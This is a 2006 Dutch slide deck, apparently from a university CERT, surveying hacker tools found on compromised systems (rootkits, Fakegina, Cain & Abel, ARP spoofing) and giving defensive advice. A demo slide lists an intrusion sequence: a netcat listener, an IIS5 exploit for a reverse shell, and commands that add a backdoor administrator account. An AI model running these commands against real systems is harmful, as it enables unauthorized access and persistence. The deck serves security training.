Hackertools welke Trojaanse paarden reizen ongemerkt mee op uw achterbank
SNE 6 November 2006
Agenda – Kort overzicht tools – Spoofing • DNS Spoofing • ARP Spoofing
– Man in the middle attack • SSL/TLS (HTTPS) • SSH
– Rootkits • Hackerdefender hiding • Backdoortraffic
Huishoudelijk
Vragen tussendoor ! Telefoontjes Veel Demo’s dus soms even geduld
Disclaimer
Blackhat - Whitehat Don’t try this at work Tools zijn soms gevaarlijk !
Werkwijze
Hoe werken hackers – Hoe komen ze binnen – Welk gereedschap gebruiken ze – Demo inbraak (NC/hackerdefender/Cain)
Hoe werken Hackers
Motivatie – Aanzien in eigen community – DDOS attacks – FTP/FXP/ Warez servers – IRC Wars
Type inbreker – Hackers, Crackers, Script Kiddies
Hoe pakt een hacker het aan
Scan het net op kwetsbare systemen Vind een gat Voer cmdshell uit Controleer diskspace/bandbreedte/cpuspeed Installeer backdoor Maak administrator account Maak tweede (derde) achterdeur Verberg sporen (rootkit/logging) Gebruik verworven rechten/subnet voor volgende hackpoging
Veel aangetroffen hackertools
In hoog tempo Is beschikbaar voor naslag Als we tijd over hebben in detail
Null Sessions Scanners
Net use \\icarus\IPC$ /user:””
””
Toegang tot vitale systeeminformatie Gebruikt door veel scantools Moeillijk te beveiligen Disable in de registry Filteren op poort 135, 139 en 445
Radmin
Remote control applicatie (Grafisch) Legale applicatie Vaak geinstalleerd onder andere naam Gebruik liever Windows Terminal service in remote management mode http://www.radmin.com/download/default.html
Dameware
Remote control applicatie (Grafisch) Legale applicatie Ouder dan 4.0 == exploits Vaak geinstalleerd onder andere naam Gebruik liever Windows Terminal service in remote management mode http://www.dameware.com
WinVNC/RealVNC
Remote control applicatie (Grafisch) Legale applicatie University of cambridge ontwerp Multiplatform Vaak geinstalleerd onder andere naam Gebruik liever Windows Terminal service in remote management mode http://www.realvnc.com
SERV-U FTP server
Compacte flexibele FTP server Legale software Vaak hernoemd Ondersteund plugins – – – –
Dynamische DNS Sitestats Uploadcredits Intersite traffic
HomeDir=c:\winnt\system32\spool\drivers\w32x86\_ \com4\aux\lpt2\lpt1\files\files\files\files
Fport
Scant lokale open poorten Met het proces wat erbij hoort Legale applicatie – www.foundstone.com/resources/freetools.htm
Kan worden hernoemd Ook nuttig voor beheerder
BOTnets
GT Bot SDBot TSUNAMI SPOOFS FrozenBot AGOBOT/Phatbot Meer in het vak IDS
Scanners
Nmap Amap HPING2/3 Superscan MBSA Nikto Nessus
SQLscan
In diverse varianten beschikbaar Inventariseert MS-SQL servers Zoekt ongepatchte servers Controleert SA wachtwoord Brute force attacks
Fakegina
Vervanging voor Windows login Illegale software Logt wachtwoorden naar bestand Volledig transparant Kan worden hernoemd (ook de passlist) Soms gecomprimeerd/scrambled
Hacker defender
Rootkit Illegale software Backdoor Verbergt sporen van hacker – – – –
Bestanden Processen Registry entries Poorten
API hooking Port multiplexing ! Open source sinds 1.00 (1 jan 2004) ! Volgende generatie rootkit op 24 april
Cain Abel
Password recovery tool ARP poisoning MITM (Man in the Middle attack) Sniffer Cracker En veel meer
Antivirus ontwijking
Executable packing (upx pepack) Executable morphing (morphine) Rootkits Renamen te scannen extensies Beschadigen/ stoppen scanner – AV killer
Steeds nieuwe versies Gebruik van legale componenten
DEMO
Sniffing op een Hub
Sniffer
Source
CISCOSYSTEMS
Hub
Destination
Host to Host ARP
Client (C)
Server (S)
Real ARP Reply
Broadcast ARP Request
Hostile
Spoofed ARP ReplyC Spoofed ARP ReplyS
Host to Router Exploit
Client (C)
Gateway Router (R)
Hostile
CISCO SYSTEMS
Real ARP Reply
Broadcast ARP Request
Spoofed ARP ReplyC Spoofed ARP ReplyR
Relay Configuration Attacker 0:c:3b:1a:7c:ef- 10.1.1.10
Alice
Bob
0:c:3b:1c:2f:1b- 10.1.1.2
0:c:3b:9:4d:8- 10.1.1.7
0:c:3b:1a:7c:ef- 10.1.1.7
0:c:3b:1a:7c:ef- 10.1.1.2
Relay Configuration (cont.)
Sniffer
Source
CISCOSYSTEMS
Switch
Destination
Knoppix-STD 0.1
Backtrack (Whax Whoppix Remote exploit)
Social Engineering
Mitnick Ex-Hacker Vermakelijk Leerzaam
Hackers exposed
Scambray Mclure Kurtz Ook in NL versie Linux/Web/Java
Vragen ?
FUD
Dit waren alleen de tools gevonden op UvA systemen Andere threats: – Haxdoor – Backoriffice (nog steeds) – Assasin – Armaggedon – Optix pro/lite
Netcat Open een listening port op lokale machine – nc –l –p portnumber
Draai IIS5Exploit.exe – IIS5exploit target_ip host_ip nc_port_number
Wacht op een Command shell – Microsoft W indows 2000[Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. – C:\W INNT\SYSTEM32>
Voeg een gebruiker to – net user hacker rabbit99 /add
Maak de gebruiker administrator – net localgroup administrators hacker /add
Wie is er aan het inbreken ?
Hoe houden we ze tegen
Well known ports
Ken je poortnummers en processen Bekende set – 22 ssh 25 smtp 110 pop 139 enz
Specifieke dingen – 8000 9200 enz
Mapping processen port numbers – Tcpview / Fport
Preventie Detectie • Virusscan/IDS/ netflow/ analyse logging / afwijkende patronen
Preventie • Patchen/Opschonen systemen/ preventieve scans
Tijdig patchen • W indows update SMS MOM SUS • SUS
Virusscanner
Wat hebben we geleerd van de netwerkscans:
Regelmatig en consequent patchen !!!! Goede wachtwoorden kiezen en regelmatig wijzigen Null shares beveiligen NT 4 uitfaseren maar nu wel patchen ! SNMP uitzetten of beveiligen Printservers laatste firmware op netwerkkaarten Minimale set services Schoon accounts op lokaal en in domein
Wat hebben we geleerd van de netwerkscans:
Regelmatig en consequent patchen !!!! Goede wachtwoorden kiezen en regelmatig wijzigen Null shares beveiligen NT 4 uitfaseren maar nu wel patchen ! SNMP uitzetten of beveiligen Printservers laatste firmware op netwerkkaarten Minimale set services Schoon accounts op lokaal en in domein
Aanbevelingen 1. Kies een degelijk wachtwoord en verander het 2. Patch het OS en de applicaties waarmee je werkt 3. Draai een up to date virusscanner 4. Na compromise altijd herinstaleren 5. Beheer alleen vanaf vertrouwde machines
Leuke tools voor anti-hackers
Windows OS en resourcekit ! – Nbtstat ipconfig netstat safe boot enz
Sysinternals.com en Winternals.com – TCPview regmon filemon autoruns enz… – Password changer – ERD commander ! $$$
Knoppix STD Foundstone.com – Fport forensics toolkit (free)
NTsecurity.nu
Contactinfo UvT-CERT –
[email protected]
SURFnet-CERT –
[email protected]
Jim Mintha –
[email protected] – 020-5254919
Jaap van Ginkel –
[email protected] – 020-5253705
Onbruikbare sheets
Wie zijn de hackers ?
Terminologie – “Hacker” : Somebody who likes to find out how systems work and how they can be made to do things they were not meant to do – “Cracker” : Somebody who breaks (into) systems
Type 1: Hackers
High to very high technical expertise – Actually find weaknesses in software – Develop code to exploit weaknesses • Most often “proof of concept” • Sometimes highly sophisticated tools
– Age 20+, most of them male – Motivation: Learning, fame within community • Has code of conduct not to do any real damage • But: Doesn't care what others do with his code
Type 2: Script Kiddies
Crackers, “Hacker wannabees” Little to no technical expertise – Uses tools from Type 1 Hackers
No code of behaviour – May disrupt service, damage data
Age 10+, most of them male, some female Motivation: Boasting, “because I can” – IRC Wars
Wie zijn die hackers
Filmpje (later als er tijd is)